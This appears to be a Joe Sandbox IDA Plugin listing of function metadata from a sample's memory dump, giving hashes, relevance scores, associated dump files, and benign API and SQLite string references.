Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6126d287ad3514f0d5b7f3f1bed8fbcd58c294c76b130dcb0bee5cf8b4261052
Instruction ID: 60dda0602bc69266270aebb5c8d47ee1f9fee358dc39a291e35d9dfe9e8a933e
Opcode Fuzzy Hash: 6126d287ad3514f0d5b7f3f1bed8fbcd58c294c76b130dcb0bee5cf8b4261052
Instruction Fuzzy Hash: 6B31E475600202DFD390CF18E885E66B3F5FF84336B1545BAE9468B262D722FC51CB52

Function 1D79E200 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a09362fc771823978f9a7b77dd4ed51c62033f3e81323fe8031a27e25c93890d
Instruction ID: 18ce6a4285f0a206809184f599f776f75e8d35c56b8e39b13ac0ee502cb30f80
Opcode Fuzzy Hash: a09362fc771823978f9a7b77dd4ed51c62033f3e81323fe8031a27e25c93890d
Instruction Fuzzy Hash: 8E1124B720A3097BE3045A64BC81FEBB3ACDF48336F11052AFB4552151EB76B91183A3

Function 1D7806E0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

VUUU, xrefs: 1D78083A

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: VUUU
API String ID: 0-2040033107
Opcode ID: db9ce26b11e4061b2a705002131f793724b36a0254c4c524ef95aed6d66bb0e5
Instruction ID: f88ce9218d26935741bbe7723155889c68b306a947868f2c9e7010eea37fffa2
Opcode Fuzzy Hash: db9ce26b11e4061b2a705002131f793724b36a0254c4c524ef95aed6d66bb0e5
Instruction Fuzzy Hash: 0B81F6B19083559FC715DF29C884A3BFBE4FF89220F05466EE989C7252E770E944CB92

Function 1D7B1FE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1D7B2001

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-914542581
Opcode ID: 316482842e2c3fb1cb6004c354bb9083d7cee8890a57985583e919ea1e26ae9a
Instruction ID: c390f0cb9f0a90a87285cb1a1b7feefef39acca357121b8b1441d702a308999f
Opcode Fuzzy Hash: 316482842e2c3fb1cb6004c354bb9083d7cee8890a57985583e919ea1e26ae9a
Instruction Fuzzy Hash: E021DD75504205BFDB11AF68EC84F66B7AAEF04364F410419F988A7232D372F860CBA7

Function 1D7AA6F0 Relevance: 7.6, APIs: 5, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d841588aaed7c9318ad90bac4da0a506aac3084825efbd8e160ed3eb6dcd40c
Instruction ID: 7630adbe8d7bee60d39ee7555836b950038d0f57b8eeb9259cd205322c61ddfa
Opcode Fuzzy Hash: 3d841588aaed7c9318ad90bac4da0a506aac3084825efbd8e160ed3eb6dcd40c
Instruction Fuzzy Hash: 996124F41483829FC720CF55C480A5BBBE1BB86350F958A2EE59A6F310D732A409CF93

Function 1D788550 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3966a2d936edd45f59b6e0deb058351046a11c26772725d757917f5ea545eae4
Instruction ID: 43c83a04953fe5e07406c3cf022ad7ccc70fa4c392eb5c62f261809221ad4ba4
Opcode Fuzzy Hash: 3966a2d936edd45f59b6e0deb058351046a11c26772725d757917f5ea545eae4
Instruction Fuzzy Hash: 6E01D1B9604311BBCB115F18FD05BAA77A5AFC4726F16046DFA0067222D336F828C7A7

Function 1D761C50 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 471COMMON

Download Yara Rule

Strings

RtreeMatchArg, xrefs: 1D761F83

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: RtreeMatchArg
API String ID: 0-1459067757
Opcode ID: 146b8a641683908b183f16e9c703e9cbe0b327827741d9ac7463d3d8f60661dc
Instruction ID: bd3cb6c88c7cadf863e692cc343f05721e832f97eaec4501d8ce8720b0b883a6
Opcode Fuzzy Hash: 146b8a641683908b183f16e9c703e9cbe0b327827741d9ac7463d3d8f60661dc
Instruction Fuzzy Hash: 0102DEB49087428FD711CF24D8C4A2ABBF5BF49364F01465EED899B221E735E944CBA3

Function 1D73298C Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 384COMMON

Download Yara Rule

APIs

GetACP.KERNEL32 ref: 1D922A1F
IsValidCodePage.KERNEL32(00000000), ref: 1D922A56
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 1D922C3A

Strings

utf8, xrefs: 1D922B28

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: CodeInfoLocalePageValid
String ID: utf8
API String ID: 790303815-905460609
Opcode ID: 324cc0f50e6ffc9dd28e0a012d8201eb5067cd5963563ae4d8c82f4d8c045c0e
Instruction ID: f6fd4ec213eda5bc3452c061593b39a208fc9c3122463ddc65054afa1b1a8121
Opcode Fuzzy Hash: 324cc0f50e6ffc9dd28e0a012d8201eb5067cd5963563ae4d8c82f4d8c045c0e
Instruction Fuzzy Hash: B871F375604206AADB279F74CCC5BBA73ACEF05710F9240ADEA09DB194EB74E540C7A3

Function 1D79E090 Relevance: 6.1, APIs: 4, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4fd3eada0e727518cb8d937ed3d72a08de97ad56f4981d5bf272560bf003879
Instruction ID: d61c034a4d4ff229405cbef202209e20c864b1ba36f19fdb357dd071948d9ee5
Opcode Fuzzy Hash: c4fd3eada0e727518cb8d937ed3d72a08de97ad56f4981d5bf272560bf003879
Instruction Fuzzy Hash: CE311672504200AFD718CF09EC40A77B7E5EF85335F05899AF8458F252D736E896C792

Function 1D732C8E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 1D8D48A7
IsDebuggerPresent.KERNEL32 ref: 1D8D4973
SetUnhandledExceptionFilter.KERNEL32 ref: 1D8D4993
UnhandledExceptionFilter.KERNEL32(?), ref: 1D8D499D

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: de832374d6baf88145f6d344987dc1015f30f9392ceee4c1de0c0bf9e5a85a80
Instruction ID: 113348346a3dfb2db499e83d193576f30d04c413812ff47b4305049d4b003fee
Opcode Fuzzy Hash: de832374d6baf88145f6d344987dc1015f30f9392ceee4c1de0c0bf9e5a85a80
Instruction Fuzzy Hash: 18311875D0531CABDB11DFA4D9897CDBBB8BF08304F1041AAE50DAB290EB759A858F05

Function 1D78EF30 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
Instruction ID: 99798a4f724f13a7fea32090c1cebfcca4c773dfce2bc49da573807cc0dafb76
Opcode Fuzzy Hash: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
Instruction Fuzzy Hash: 711108319085627BD3528B29E844B56F7A1BF44334F064A66FC499BA62D322F860C7D3

Function 1D7F3770 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction ID: d58aca86222f33ccc6c1fd31bbe89473c598c340e2fbb628e23b3727e4dd9330
Opcode Fuzzy Hash: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction Fuzzy Hash: D5E0BF35008710BFCB125F54ED4AE4BBFB6BF48721F060D19F6C521571C772A860AB42

Function 1D8137E0 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
Instruction ID: b5aa2980edece9b1fb7720561d82e5bcc59c7bc0158793a5b8055cf9938cf0fb
Opcode Fuzzy Hash: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
Instruction Fuzzy Hash: ADE0BF35008750BFCB125F55EC49E4BBFB6AF48325F060D19F68561471C7B2A8A1AB42

Function 1D7D5910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 1D7D597E

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
API String ID: 0-143322027
Opcode ID: d52823f70adf4d4914a0887fe6302787e62ab69aa2800013c090a87ee1ab3edb
Instruction ID: aa5b4ff925e735939ca21b7179cc6384473c7661f2860bdc073c21d3e817faa2
Opcode Fuzzy Hash: d52823f70adf4d4914a0887fe6302787e62ab69aa2800013c090a87ee1ab3edb
Instruction Fuzzy Hash: 6F11AFB5500605BFD7108F58CC84F96BBBDFF45328F014145FA0857262C3B2B4A4CBA2

Function 1D768970 Relevance: 4.6, APIs: 3, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4038abb6d1fc111187d28ee66f17f9e3b2efdb882336adb76a10e71e36a91bf
Instruction ID: 5719535c2051fb7bac8e1dfbede8902a66914574ebb315d7037ae8de7222ac80
Opcode Fuzzy Hash: e4038abb6d1fc111187d28ee66f17f9e3b2efdb882336adb76a10e71e36a91bf
Instruction Fuzzy Hash: ED410676508211AFCB019F28EC4096BB7A5EF84234F054569F944972A1E736EC52CBB3

Function 1D7ED3B0 Relevance: 4.6, APIs: 3, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8969008ce381b23799d73fc7940baa6ab7e2ac6de20cda7f09aa82a1c7516ed2
Instruction ID: 3169ac485a31f272da3b48b274ec38178124fd027eb5c427a5829110c14c8612
Opcode Fuzzy Hash: 8969008ce381b23799d73fc7940baa6ab7e2ac6de20cda7f09aa82a1c7516ed2
Instruction Fuzzy Hash: FA319AB4614201ABE700DF6DEC84F66B3E9FF59265F018629FA48C3351E771F910CAA2

Function 1D7D55B0 Relevance: 4.6, APIs: 3, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
